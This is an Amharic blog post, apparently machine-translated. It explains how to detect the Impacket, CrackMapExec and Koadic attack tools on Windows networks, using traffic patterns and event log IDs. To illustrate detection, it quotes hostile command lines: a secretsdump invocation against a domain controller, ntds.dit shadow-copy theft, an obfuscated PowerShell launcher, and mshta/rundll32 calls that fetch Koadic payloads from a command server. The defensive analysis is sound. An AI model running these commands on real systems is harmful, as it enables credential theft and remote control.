ፕሮሆስተር > ጦማር > አስተዳደር > በዊንዶውስ መሠረተ ልማት ላይ ጥቃቶችን እንዴት ማግኘት እንደሚቻል፡ የጠላፊ መሳሪያዎችን ማሰስ

በዊንዶውስ መሠረተ ልማት ላይ ጥቃቶችን እንዴት ማግኘት እንደሚቻል፡ የጠላፊ መሳሪያዎችን ማሰስ

በዊንዶውስ መሠረተ ልማት ላይ ጥቃቶችን እንዴት ማግኘት እንደሚቻል፡ የጠላፊ መሳሪያዎችን ማሰስ

በድርጅት ዘርፍ የሚደርሱ ጥቃቶች ቁጥር በየዓመቱ እያደገ ነው፡ ለምሳሌ፡- እ.ኤ.አ. በ2017 13% ተጨማሪ ልዩ ክስተቶች ተመዝግቧል ከ 2016 እና በ 2018 መጨረሻ - 27% ተጨማሪ ክስተቶችካለፈው ጊዜ ይልቅ. ዋናው የሥራ መሣሪያ የዊንዶውስ ኦፐሬቲንግ ሲስተም የሆኑትን ጨምሮ. በ2017-2018፣ APT Dragonfly፣ APT28፣ APT MuddyWater በአውሮፓ፣ በሰሜን አሜሪካ እና በሳውዲ አረቢያ በመንግስት እና በወታደራዊ ድርጅቶች ላይ ጥቃት ፈጽሟል። ለዚህም ሶስት መሳሪያዎችን ተጠቅመዋል- ኢምፓኬት, CrackMapExec и ኮአዲች. የእነሱ ምንጭ ኮድ ክፍት እና በ GitHub ላይ ይገኛል።

እነዚህ መሳሪያዎች ለመጀመሪያ ጊዜ ወደ ውስጥ ለመግባት ጥቅም ላይ እንዳልዋሉ ልብ ሊባል የሚገባው ነው, ነገር ግን በመሠረተ ልማት ውስጥ ለሚፈጠር ጥቃት እድገት. አጥቂዎች የፔሪሜትር መግባቱን ተከትሎ በተለያዩ የጥቃቱ ደረጃዎች ይጠቀማሉ። በነገራችን ላይ ይህ ለመለየት አስቸጋሪ እና ብዙ ጊዜ በቴክኖሎጂ እርዳታ ብቻ ነው በአውታረ መረብ ትራፊክ ውስጥ የስምምነት ምልክቶችን መለየት ወይም መሳሪያዎች ወደ ወደ መሠረተ ልማቱ ከገባ በኋላ የወራሪውን ንቁ እርምጃዎችን ይወቁ. መሳሪያዎቹ ፋይሎችን ከማስተላለፍ አንስቶ ከመዝገቡ ጋር መስተጋብር ለመፍጠር እና በርቀት ማሽን ላይ ትዕዛዞችን እስከመፈጸም ድረስ የተለያዩ ተግባራትን ይሰጣሉ። የእነዚህን መሳሪያዎች የኔትወርክ እንቅስቃሴ ለመወሰን ጥናት አድርገናል.

ምን ማድረግ አለብን:

  • የጠለፋ መሳሪያዎች እንዴት እንደሚሠሩ ይረዱ. አጥቂዎች ምን መበዝበዝ እንዳለባቸው እና ምን ቴክኖሎጂዎችን መጠቀም እንደሚችሉ ይወቁ።
  • በጥቃቱ የመጀመሪያ ደረጃዎች ውስጥ በመረጃ ደህንነት መሳሪያዎች ያልተገኘውን ያግኙ. የስለላ ደረጃው ሊዘለል ይችላል, ምክንያቱም አጥቂው ውስጣዊ አጥቂ ነው, ወይም አጥቂው ቀደም ሲል ያልታወቀ የመሰረተ ልማት ጉድለቶችን ስለሚጠቀም ነው. የድርጊቱን አጠቃላይ ሰንሰለት መመለሾ ይቻላል, ስለዚህ ተጨማሪ እንቅስቃሴን የመለየት ፍላጎት ይነሳል.
  • ከወረራ ማወቂያ መሳሪያዎች የውሸት አወንታዊ ውጤቶችን ያስወግዱ. አንዳንድ ድርጊቶች በእውቀት ላይ ብቻ ሲገኙ በተደጋጋሚ ስህተቶች ሊኖሩ እንደሚችሉ መዘንጋት የለብንም. ብዙውን ጊዜ በመሠረተ ልማት አውታሮች ውስጥ ማንኛውንም መረጃ ለማግኘት በመጀመሪያ እይታ ከሕጋዊነት የማይለይ በቂ ቁጥር ያላቸው መንገዶች አሉ።

እነዚህ መሳሪያዎች ለአጥቂዎች ምን ይሰጣሉ? ኢምፓኬት ከሆነ አጥቂዎቹ የፔሪሜትር ዘልቆ መግባትን ተከትሎ በተለያዩ የጥቃቱ ደረጃዎች ላይ ሊያገለግሉ የሚችሉ ትልቅ የሞጁሎች ቤተ-መጽሐፍት ያገኛሉ። ብዙ መሳሪያዎች እንደ Metasploit ያሉ የኢምፓኬት ሞጁሎችን ከውስጥ ይጠቀማሉ። ትዕዛዞችን በርቀት ለማስኬድ dcomexec እና wmiexec አለው፣ከኢምፓኬት የተጨመሩ የማህደረ ትውስታ ደብተሮችን ለማግኘት ሚስጥራዊ ማከማቻ አለው። በውጤቱም, የእንደዚህ አይነት ቤተ-መጽሐፍት እንቅስቃሴን በትክክል ማግኘቱ ተዋጽኦዎችን መገኘቱን ያረጋግጣል.

ስለ CrackMapExec (ወይም በቀላሉ ሲኤምኢ)፣ ፈጣሪዎቹ በአንድ ምክንያት “በ Impacket የተጎለበተ” ብለው ጽፈዋል። በተጨማሪም፣ CME ለታዋቂ ሁኔታዎች ዝግጁ የሆነ ተግባር አለው፡ ይህ ሚሚካትዝ የይለፍ ቃሎችን ወይም ሃሾችን ለማግኘት፣ እና የሜተርፕሬተር ወይም ኢምፓየር ወኪል ለርቀት ማስፈጸሚያ መግቢያ እና Bloodhound በቦርዱ ላይ ነው።

ሦስተኛው ምርጫችን ኮአዲክ ነው። እሱ በጣም ትኩስ ነው ፣ በ 25 በዓለም አቀፍ የጠላፊ ኮንፈረንስ DEFCON 2017 ቀርቧል እና መደበኛ ያልሆነ አካሄድ አለው፡ በ HTTP፣ Java Script እና Microsoft Visual Basic Script (VBS) ይሰራል። ይህ አካሄድ ከመሬት ውጭ መኖር ይባላል፡- መሳሪያው በዊንዶው ውስጥ የተገነቡ የጥገኛ እና ቤተ-መጻሕፍትን ይጠቀማል። ፈጣሪዎቹ COM Command & Control ወይም C3 ብለው ይጠሩታል።

IMPACKET

የኢምፓኬት ተግባር በጣም ሰፊ ነው፣ በ AD ውስጥ ከዳሰሳ እና ከውስጥ MS SQL አገልጋዮች መረጃን ከመሰብሰብ ጀምሮ ፣ ምስክርነቶችን ለማግኘት ቴክኒኮችን ያበቃል ይህ የ SMB ቅብብል ጥቃት ነው ፣ እና የተጠቃሚ የይለፍ ቃል ሃሾችን የያዘውን ntds.dit ፋይል ከአንድ ጎራ ማግኘት። ተቆጣጣሪ. ኢምፓኬት አራት የተለያዩ ዘዴዎችን በመጠቀም በርቀት ትዕዛዞችን ያስፈጽማል፡ በWMI በኩል፣ የዊንዶውስ መርሐግብር አዘጋጅን፣ ዲኮም እና ኤስኤምቢን ለማስተዳደር አገልግሎት፣ ለዚህ ​​ደግሞ ምስክርነቶችን ይፈልጋል።

ሚስጥራዊ ቆሻሻ መጣያ

ሚስጥራዊነትን እየን። ይህ ሁለቱንም የተጠቃሚ ማሽኖች እና የጎራ ተቆጣጣሪዎች ሊያነጣጥር የሚችል ሞጁል ነው። በእሱ አማካኝነት የ LSA, SAM, SECURITY, NTDS.dit የማስታወሻ ቦታዎች ቅጂዎችን ማግኘት ይችላሉ, ስለዚህም በተለያዩ የጥቃቱ ደረጃዎች ላይ ሊታይ ይችላል. በሞጁሉ ውስጥ የመጀመሪያው እርምጃ በኤስኤምቢ በኩል ማረጋገጥ ነው ፣ ይህም የተጠቃሚውን የይለፍ ቃል ወይም ሃሽ ወዲያውኑ ማለፍ የ Hash ጥቃትን ይፈልጋል። ቀጥሎም ወደ አገልግሎት ቁጥጥር አስተዳዳሪ (ሲ.ኤም.ኤም.) መዳረሻ ለመክፈት እና የዊንሬግ ፕሮቶኮልን በመጠቀም ወደ መዝገቡ ለመግባት ጥያቄ ይመጣል ፣ በዚህም አጥቂው የፍላጎት ቅርንጫፎችን መረጃ ለማወቅ እና በ SMB በኩል ውጤቱን ማግኘት ይችላል።

በለስ ላይ. 1 በትክክል እንዴት የዊንሬግ ፕሮቶኮልን ሲጠቀሙ ከኤልኤስኤ ጋር በመመዝገቢያ ቁልፍ ማግኘት እንደሚቻል እናያለን። ይህንን ለማድረግ የDCERPC ትዕዛዝን በ opcode 15 - OpenKey ይጠቀሙ።

በዊንዶውስ መሠረተ ልማት ላይ ጥቃቶችን እንዴት ማግኘት እንደሚቻል፡ የጠላፊ መሳሪያዎችን ማሰስ
ሩዝ. 1. የዊንሬግ ፕሮቶኮልን በመጠቀም የመመዝገቢያ ቁልፍን መክፈት

በተጨማሪም ፣ በቁልፍ መድረስ ሲቻል ፣ እሴቶቹ በ SaveKey ትዕዛዝ በ opcode 20 ይቀመጣሉ ። ኢምፓኬት ይህንን የሚያደርገው በተለየ መንገድ ነው። እሴቶቹን በስሙ የ8 የዘፈቀደ ቁምፊዎች ሕብረቁምፊ በሆነው .tmp በተገጠመ ፋይል ላይ ያስቀምጣል። በተጨማሪም, የዚህን ፋይል ተጨማሪ ማራገፍ በSMB በኩል ከSystem32 ማውጫ (ምስል 2) ይከሰታል.

በዊንዶውስ መሠረተ ልማት ላይ ጥቃቶችን እንዴት ማግኘት እንደሚቻል፡ የጠላፊ መሳሪያዎችን ማሰስ
ሩዝ. 2. ከርቀት ማሽን የመመዝገቢያ ቁልፍ ለማግኘት እቅድ

የ Winreg ፕሮቶኮልን ፣ የተወሰኑ ስሞችን ፣ ትዕዛዞችን እና ትዕዛዞቹን በመጠቀም የተወሰኑ የመመዝገቢያ ቅርንጫፎችን በመጠየቅ በአውታረ መረቡ ላይ እንደዚህ ያለ እንቅስቃሴን ማግኘት ይችላሉ።

እንዲሁም, ይህ ሞጁል በቀላሉ የተገኘበት ምስጋና በዊንዶውስ ክስተት ምዝግብ ማስታወሻ ውስጥ ይተዋል. ለምሳሌ, ትዕዛዙን በመፈፀም ምክንያት

secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DC

በዊንዶውስ አገልጋይ 2016 ምዝግብ ማስታወሻ ውስጥ የሚከተሉትን የቁልፍ ቅደም ተከተሎች እናያለን-

1. 4624 - የርቀት መግቢያ.
2. 5145 - የዊንሬግ የርቀት አገልግሎት የመዳረሻ መብቶችን ማረጋገጥ.
3. 5145 - በSystem32 ማውጫ ውስጥ የአንድ ፋይል የመዳረሻ መብቶችን ማረጋገጥ. ፋይሉ ከላይ የተጠቀሰው የዘፈቀደ ስም አለው።
4. 4688 - vssadmin ን የሚያስጀምር cmd.exe ሂደት መፍጠር:

“C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 - በትእዛዙ ሂደት መፍጠር-

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

6. 4688 - በትእዛዙ ሂደት መፍጠር-

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsNTDSntds.dit %SYSTEMROOT%TemprmumAfcn.tmp ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

7. 4688 - በትእዛዙ ሂደት መፍጠር-

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

Smbexec

ልክ እንደ ብዙ የድህረ-ብዝበዛ መሳሪያዎች፣ Impacket ለርቀት ትዕዛዝ ማስፈጸሚያ ሞጁሎች አሉት። በርቀት ማሽን ላይ በይነተገናኝ ትዕዛዝ ሼል በሚሰጥ smbexec ላይ እናተኩራለን። ይህ ሞጁል በSMB በኩል በይለፍ ቃል ወይም በሃሽ ማረጋገጥን ይፈልጋል። በለስ ላይ. 3 የእንደዚህ አይነት መሳሪያ አሠራር ምሳሌ እናያለን, በዚህ ጉዳይ ላይ የአካባቢ አስተዳዳሪ ኮንሶል ነው.

በዊንዶውስ መሠረተ ልማት ላይ ጥቃቶችን እንዴት ማግኘት እንደሚቻል፡ የጠላፊ መሳሪያዎችን ማሰስ
ሩዝ. 3. smbexec መስተጋብራዊ ኮንሶል

ከማረጋገጫ በኋላ በ smbexec ውስጥ የመጀመሪያው እርምጃ SCM በ OpenSCManagerW(15) ትዕዛዝ መክፈት ነው። መጠይቁ የሚታወቅ ነው፡ ወደ DUMMY የተቀናበረው የማሽን ስም መስክ አለው።

በዊንዶውስ መሠረተ ልማት ላይ ጥቃቶችን እንዴት ማግኘት እንደሚቻል፡ የጠላፊ መሳሪያዎችን ማሰስ
ሩዝ. 4. የአገልግሎት ቁጥጥር አስተዳዳሪን ለመክፈት ይጠይቁ

በመቀጠል አገልግሎቱ የተፈጠረው የ CreateServiceW (12) ትዕዛዝን በመጠቀም ነው. በ smbexec ጉዳይ ላይ, በእያንዳንዱ ጊዜ ተመሳሳይ የትእዛዝ ግንባታ አመክንዮ ማየት እንችላለን. በለስ ላይ. 5 አረንጓዴ ቀለም የትዕዛዙን የማይለወጡ መለኪያዎች ያሳያል, ቢጫ - አጥቂው ምን ሊለውጠው ይችላል. የሚፈፀመው ፋይል ስም ፣ ማውጫው እና የውጤት ፋይሉ ሊቀየር እንደሚችል ማየት ቀላል ነው ፣ ግን የተቀረው የኢምፓኬት ሞጁሉን አመክንዮ ሳይጥስ ለመለወጥ በጣም ከባድ ነው።

በዊንዶውስ መሠረተ ልማት ላይ ጥቃቶችን እንዴት ማግኘት እንደሚቻል፡ የጠላፊ መሳሪያዎችን ማሰስ
ሩዝ. 5. የአገልግሎት መቆጣጠሪያ አስተዳዳሪን በመጠቀም አገልግሎት ለመፍጠር ይጠይቁ

Smbexec በዊንዶውስ ክስተት ምዝግብ ማስታወሻ ውስጥ ግልጽ የሆኑ ዱካዎችን ይተዋል. በዊንዶውስ አገልጋይ 2016 ምዝግብ ማስታወሻ ላይ ለበይነተገናኝ ትዕዛዝ ሼል ከ ipconfig ትእዛዝ ጋር ፣የሚከተሉትን የቁልፍ ቅደም ተከተሎች እናያለን።

1. 4697 - አገልግሎቱን በተጠቂው ማሽን ላይ መጫን;

%COMSPEC% /Q /c echo cd ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

2. 4688 - የ cmd.exe ሂደትን ከቁጥር 1 ነጋሪ እሴቶች ጋር መፍጠር።
3. 5145 - በ C$ ማውጫ ውስጥ የ__ውጤት ፋይልን የመዳረሻ መብቶችን ማረጋገጥ።
4. 4697 - በተጠቂው ማሽን ላይ አገልግሎቱን መጫን.

%COMSPEC% /Q /c echo ipconfig ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 - የ cmd.exe ሂደትን ከቁጥር 4 ነጋሪ እሴቶች ጋር መፍጠር።
6. 5145 - በ C$ ማውጫ ውስጥ የ__ውጤት ፋይልን የመዳረሻ መብቶችን ማረጋገጥ።

Impacket የጥቃት መሳሪያዎችን ለማዘጋጀት መሰረት ነው. በዊንዶውስ መሠረተ ልማት ውስጥ ሁሉንም ፕሮቶኮሎች ይደግፋል እና በተመሳሳይ ጊዜ የራሱ ባህሪያት አሉት. የተወሰኑ የዊንጌግ ጥያቄዎች፣ እና የኤስሲኤምኤ ኤፒአይን ከትዕዛዞች አፈጣጠር ባህሪ ጋር፣ እና የፋይል ስሞች ቅርጸት እና SMB መጋራት SYSTEM32 እዚህ አሉ።

CRACKMAPEXEC

የCME መሳሪያው በዋናነት የተነደፈው አጥቂ በኔትወርኩ ውስጥ ለመራመድ የሚያደርጋቸውን የተለመዱ ተግባራትን በራስ ሰር ለመስራት ነው። ከታዋቂው ኢምፓየር ወኪል እና ተርጓሚ ጋር በጥምረት እንዲሰሩ ያስችልዎታል። ትዕዛዞችን በማይታይ ሁኔታ ለማስፈጸም CME ሊደብቃቸው ይችላል። Bloodhound (የተለየ የስለላ መሳሪያ) በመጠቀም አጥቂ የነቃ የጎራ አስተዳዳሪ ክፍለ ጊዜ ፍለጋን በራስ ሰር ሊያደርገው ይችላል።

ደም ማፍሰስ

Bloodhound እንደ ራሱን የቻለ መሳሪያ በኔትወርኩ ውስጥ የላቀ ቅኝት እንዲያደርጉ ያስችልዎታል። ስለተጠቃሚዎች፣ ማሽኖች፣ ቡድኖች፣ ክፍለ-ጊዜዎች ውሂብ ይሰበስባል እና እንደ PowerShell ስክሪፕት ወይም ሁለትዮሽ ይመጣል። ኤልዲኤፒ ወይም በSMB ላይ የተመሠረቱ ፕሮቶኮሎች መረጃ ለመሰብሰብ ጥቅም ላይ ይውላሉ። የCME ውህደት ሞጁል Bloodhoundን ወደ ተጎጂው ማሽን ለማውረድ ፣ ለማስኬድ እና የተሰበሰበውን መረጃ ከተፈፀመ በኋላ እንዲቀበሉ ይፈቅድልዎታል ፣ በዚህም በሲስተሙ ውስጥ ያሉትን ድርጊቶች በራስ-ሰር እንዲሰሩ እና እንዲታዩ ያደርጋቸዋል። የBloodhound ስዕላዊ ቅርፊት የተሰበሰበውን መረጃ በግራፍ መልክ ያቀርባል፣ ይህም ከአጥቂው ማሽን ወደ ጎራ አስተዳዳሪው አጭሩ መንገድ ለማግኘት ያስችላል።

በዊንዶውስ መሠረተ ልማት ላይ ጥቃቶችን እንዴት ማግኘት እንደሚቻል፡ የጠላፊ መሳሪያዎችን ማሰስ
ሩዝ. 6. Bloodhound በይነገጽ

በተጎጂው ማሽን ላይ ለመስራት ሞጁሉ ATSVC እና SMB በመጠቀም ስራ ይፈጥራል። ATSVC ከዊንዶውስ ተግባር መርሐግብር ጋር ለመስራት በይነገጽ ነው። CME በኔትወርኩ ላይ ስራዎችን ለመፍጠር NetrJobAdd(1) ተግባሩን ይጠቀማል። የ CME ሞጁል የሚልከውን ምሳሌ በ fig. 7: ይህ በኤክስኤምኤል ቅርጸት በክርክር መልክ ወደ cmd.exe ትዕዛዝ እና የተደበቀ ኮድ ጥሪ ነው።

በዊንዶውስ መሠረተ ልማት ላይ ጥቃቶችን እንዴት ማግኘት እንደሚቻል፡ የጠላፊ መሳሪያዎችን ማሰስ
ምስል.7. በCME በኩል አንድ ተግባር መፍጠር

ተግባሩን ለመፈጸም ከቀረበ በኋላ የተጎጂው ማሽን Bloodhound እራሱን ይጀምራል, እና ይህ በትራፊክ ውስጥ ይታያል. ሞጁሉ መደበኛ ቡድኖችን ለማግኘት በኤልዲኤፒ መጠይቆች ይገለጻል፣ ሁሉም ማሽኖች እና በጎራ ውስጥ ያሉ ተጠቃሚዎች ዝርዝር፣ በ SRVSVC NetSessEnum ጥያቄ በኩል ስለ ንቁ ተጠቃሚ ክፍለ-ጊዜዎች መረጃ ማግኘት።

በዊንዶውስ መሠረተ ልማት ላይ ጥቃቶችን እንዴት ማግኘት እንደሚቻል፡ የጠላፊ መሳሪያዎችን ማሰስ
ሩዝ. 8. በSMB በኩል የነቃ ክፍለ ጊዜዎችን ዝርዝር ማግኘት

በተጨማሪም ደምን በተጎጂው ማሽን ላይ ኦዲት ማድረግን መጀመር መታወቂያ 4688 (የሂደት ፈጠራ) እና የሂደቱ ስም ያለው ክስተት አብሮ ይመጣል። «C:WindowsSystem32cmd.exe». በእሱ ውስጥ የሚታወቁት የትእዛዝ መስመር ነጋሪ እሴቶች ናቸው-

cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , … , 40,41 )-jOIN'' ) "

enum_avproducts

የ enum_avproducts ሞጁል ከተግባራዊነት እና አተገባበር አንፃር በጣም አስደሳች ነው። WMI ከተለያዩ የዊንዶውስ ዕቃዎች መረጃ ለማግኘት የWQL መጠይቅ ቋንቋን እንድትጠቀም ይፈቅድልሃል፣ ይህም በመሠረቱ ይህ የCME ሞጁል የሚጠቀመው ነው። በተጠቂው ማሽን ላይ ስለተጫኑት የመከላከያ መሳሪያዎች ለAntiSpywareProduct እና AntiMirusProduct ክፍሎች ጥያቄዎችን ያመነጫል። አስፈላጊውን መረጃ ለማግኘት ሞጁሉ ከ rootSecurityCenter2 የስም ቦታ ጋር ይገናኛል ከዚያም የWQL ጥያቄ ያመነጫል እና ምላሽ ይቀበላል። በለስ ላይ. 9 የእንደዚህ አይነት ጥያቄዎችን እና ምላሾችን ይዘት ያሳያል. በእኛ ምሳሌ ውስጥ የዊንዶውስ ተከላካይ ተገኝቷል.

በዊንዶውስ መሠረተ ልማት ላይ ጥቃቶችን እንዴት ማግኘት እንደሚቻል፡ የጠላፊ መሳሪያዎችን ማሰስ
ሩዝ. 9. የ enum_avproducts ሞጁል የአውታረ መረብ እንቅስቃሴ

ብዙ ጊዜ WMI (Trace WMI-Activity) ኦዲት ማድረግ፣ ስለ WQL መጠይቆች ጠቃሚ መረጃዎችን ማግኘት በሚችሉባቸው ክስተቶች ውስጥ ሊጠፋ ይችላል። ነገር ግን ከነቃ enum_avproducts ስክሪፕት ከተሰራ መታወቂያ 11 ያለው ክስተት ይከማቻል።ጥያቄውን ያቀረበውን የተጠቃሚ ስም እና ስም በ rootSecurityCenter2 ስም ቦታ ይይዛል።

እያንዳንዱ የCME ሞጁሎች የየራሳቸው ቅርሶች ነበሯቸው፣ የተወሰኑ የWQL መጠይቆችም ይሁኑ ወይም በተግባር መርሐግብር ውስጥ የተወሰነ አይነት ተግባር በመፍጠር በኤልዲኤፒ እና በኤስኤምቢ ውስጥ ከደም ማጥፋት እና ከደም-ተኮር እንቅስቃሴ ጋር።

KOADIC

የKoadic ልዩ ባህሪ አብሮገነብ ጃቫስክሪፕት እና ቪቢስክሪፕት በዊንዶውስ ውስጥ መጠቀም ነው። ከዚህ አንፃር, ከመሬት ላይ የመኖር አዝማሚያን ይከተላል - ማለትም, ውጫዊ ጥገኛ የለውም እና መደበኛ የዊንዶውስ መሳሪያዎችን ይጠቀማል. ይህ ሙሉ ለሙሉ ትዕዛዝ እና ቁጥጥር (ሲኤንሲ) መሳሪያ ነው, ምክንያቱም ከበሽታ በኋላ, "ኢምፕላንት" በማሽኑ ላይ ተጭኗል, ይህም ቁጥጥር እንዲደረግበት ያስችላል. እንዲህ ዓይነቱ ማሽን በኮአዲክ ቃላት ውስጥ "ዞምቢ" ተብሎ ይጠራል. ከተጠቂው ጎን ሙሉ በሙሉ ለመስራት በቂ ልዩ መብቶች ከሌሉ Koadic የተጠቃሚ መለያ መቆጣጠሪያ ማለፊያ (UAC bypass) ቴክኒኮችን በመጠቀም የማሳደግ ችሎታ አለው።

በዊንዶውስ መሠረተ ልማት ላይ ጥቃቶችን እንዴት ማግኘት እንደሚቻል፡ የጠላፊ መሳሪያዎችን ማሰስ
ሩዝ. 10. Koadic ትዕዛዝ ሼል

ተጎጂው ከኮማንድ እና መቆጣጠሪያ አገልጋይ ጋር ግንኙነት መጀመር አለበት። ይህንን ለማድረግ ቀድሞ የተዘጋጀውን ዩአርአይ ማግኘት እና ከደረጃዎቹ አንዱን በመጠቀም ዋናውን የኮአዲክ አካል ማግኘት አለባት። በለስ ላይ. 11 ለደረጃው mshta ምሳሌ ያሳያል።

በዊንዶውስ መሠረተ ልማት ላይ ጥቃቶችን እንዴት ማግኘት እንደሚቻል፡ የጠላፊ መሳሪያዎችን ማሰስ
ሩዝ. 11. የክፍለ-ጊዜውን መጀመር ከ CnC አገልጋይ ጋር

በምላሹ በ WS ተለዋዋጭ ፣ አፈፃፀሙ በ WScript.Shell እና STAGER ፣ SESSIONKEY ፣ JOBKEY ፣ JOBKEYPATH ፣ EXPIRE ተለዋዋጮች ስለአሁኑ ክፍለ ጊዜ ግቤቶች ቁልፍ መረጃ እንደያዙ ግልፅ ይሆናል። ይህ ከCnC አገልጋይ ጋር በኤችቲቲፒ ግንኙነት ውስጥ የመጀመሪያው የጥያቄ-ምላሽ ጥንድ ነው። ተከታይ ጥያቄዎች ከተጠሩት ሞጁሎች (ተከላዎች) ተግባራዊነት ጋር በቀጥታ የተያያዙ ናቸው. ሁሉም የኮአዲክ ሞጁሎች የሚሰሩት ከነቃ የCnC ክፍለ ጊዜ ጋር ብቻ ነው።

Mimikatz

ልክ CME ከBloodhound ጋር እንደሚሰራ፣ Koadic ከሚሚካትዝ ጋር እንደ የተለየ ፕሮግራም ይሰራል እና እሱን ለማስኬድ ብዙ መንገዶች አሉት። ከታች የሚሚካትዝ ተከላ ለማውረድ የጥያቄ-ምላሽ ጥንድ ነው።

በዊንዶውስ መሠረተ ልማት ላይ ጥቃቶችን እንዴት ማግኘት እንደሚቻል፡ የጠላፊ መሳሪያዎችን ማሰስ
ሩዝ. 12. Mimikatz ወደ Koadic ያስተላልፉ

በጥያቄው ውስጥ የዩአርአይ ቅርጸት እንዴት እንደተቀየረ ማየት ይችላሉ። ለተመረጠው ሞጁል ተጠያቂ የሆነው ለ csrf ተለዋዋጭ እሴት አለው. ለስሟ ምንም ትኩረት አትስጥ; CSRF በተለምዶ በተለየ መንገድ እንደሚረዳ ሁላችንም እናውቃለን። ይኸው የ Koadic ዋና አካል ምላሽ መጣ፣ የትኛው ኮድ ከሚሚካትዝ ጋር የተገናኘ። እሱ በጣም ትልቅ ነው ፣ ስለሆነም ዋና ዋና ነጥቦቹን እንመልከት ። ቤዝ64 ኢንኮድ የተደረገው ሚሚካትዝ ቤተ-መጽሐፍት፣ የሚወጋው ተከታታይ .NET ክፍል፣ እና ሚሚካትዝን ለማሄድ የሚነሱ ክርክሮች እዚህ አሉ። የማስፈጸሚያው ውጤት በአውታረ መረቡ ላይ ግልጽ በሆነ ጽሑፍ ውስጥ ተላልፏል.

በዊንዶውስ መሠረተ ልማት ላይ ጥቃቶችን እንዴት ማግኘት እንደሚቻል፡ የጠላፊ መሳሪያዎችን ማሰስ
ሩዝ. 13. Mimikatz በሩቅ ማሽን ላይ የማሄድ ውጤት

Exec_cmd

ኮአዲች በርቀት ትዕዛዞችን ማስፈጸም የሚችሉ ሞጁሎች አሉት። እዚህ ተመሳሳይ የ URI ትውልድ ዘዴ እና የታወቁ የሲድ እና የ csrf ተለዋዋጮችን እናያለን። በexec_cmd ሞጁል ላይ የሼል ትዕዛዞችን ለመፈጸም ወደሚችለው አካል ኮድ ተጨምሯል። የሚከተለው ኮድ በCnC አገልጋይ HTTP ምላሽ ላይ ይታያል።

በዊንዶውስ መሠረተ ልማት ላይ ጥቃቶችን እንዴት ማግኘት እንደሚቻል፡ የጠላፊ መሳሪያዎችን ማሰስ
ሩዝ. 14. የመትከል ኮድ exec_cmd

ለኮድ አፈጻጸም ከሚታወቀው WS ባህሪ ጋር ተለዋዋጭ GAWTUUGCFI ያስፈልጋል። በእሱ እርዳታ, ተከላው ቅርፊቱን ይጠራል, ሁለት የኮድ ቅርንጫፎችን በማስኬድ - shell.exec በውጤቱ የውሂብ ዥረት መመለስ እና shell.run ሳይመለስ.

ኮአዲች የተለመደ መሳሪያ አይደለም፣ ነገር ግን በህጋዊ ትራፊክ ውስጥ የሚገኝበት የራሱ ቅርሶች አሉት።

  • የኤችቲቲፒ ጥያቄዎች ልዩ ምስረታ ፣
  • WinHttpRequests API በመጠቀም፣
  • በActiveXObject በኩል የWScript.Shell ነገር መፍጠር፣
  • ትልቅ ተፈጻሚ አካል.

የመነሻ ግንኙነት ደረጃውን ያስጀምረዋል, ስለዚህ በዊንዶውስ ክስተቶች በኩል እንቅስቃሴውን ማግኘት ይቻላል. ለ mshta፣ ይህ ክስተት 4688 ነው፣ ይህም ከጅምር ባህሪ ጋር ሂደት መፈጠሩን ያመለክታል፡-

C:Windowssystem32mshta.exe http://192.168.211.1:9999/dXpT6

Koadic ን በሚሮጥበት ጊዜ፣ ሌሎች 4688 ክስተቶች ፍፁም በሆነ መልኩ ከሚለዩት ባህሪያት ጋር ሊታዩ ይችላሉ፡-

rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:Windowssystem32cmd.exe" /q /c chcp 437 & net session 1> C:Usersuser02AppDataLocalTemp6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:Windowssystem32cmd.exe" /q /c chcp 437 & ipconfig 1> C:Usersuser02AppDataLocalTemp721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1

ግኝቶች

